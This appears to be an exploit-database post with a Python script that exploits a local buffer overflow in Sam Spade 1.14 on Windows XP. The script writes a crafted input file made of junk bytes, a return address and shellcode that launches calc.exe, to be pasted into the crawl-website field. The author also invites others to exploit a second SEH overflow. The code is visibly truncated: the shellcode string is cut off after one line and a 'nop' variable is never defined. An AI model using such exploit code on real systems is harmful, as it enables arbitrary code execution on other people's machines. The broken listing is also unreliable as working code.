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Sam Spade 1.14 Buffer Overflow
来源:MandawCoder@gmail.com 作者:Coder 发布时间:2015-11-04  
# Exploit Title     : Sam Spade 1.14 - Buffer OverFlow
# Date              : 10/30/2015
# Exploit Author    : MandawCoder
# Contact           : MandawCoder@gmail.com
# Vendor Homepage   : http://samspade.org
# Software Link     : http://www.majorgeeks.com/files/details/sam_spade.html
# Version           : 1.14
# Tested on         : XP Professional SP3 En x86
# Category          : Local Exploit
# Description:
# bug is on this section == Tools -> Crawl website...
# Execute following exploit, then delete "http://" from "CRAWL all URLs below" part, then paste the content of file.txt into mentioned section.
# this section(and other sections as well) also has SEH buffer overflow ... I would really appreciated if someone Exploit it.

f = open("file.txt", "w")

Junk = "A"*503

addr = "\x53\x93\x42\x7E"

space = "AAAA"


# Shellcode:
# windows/exec - 277 bytes
# CMD=calc.exe
shellcode= ("\xba\x1c\xb4\xa5\xac\xda\xda\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"

f.write(Junk + addr + space + nop + shellcode)


print "Done"

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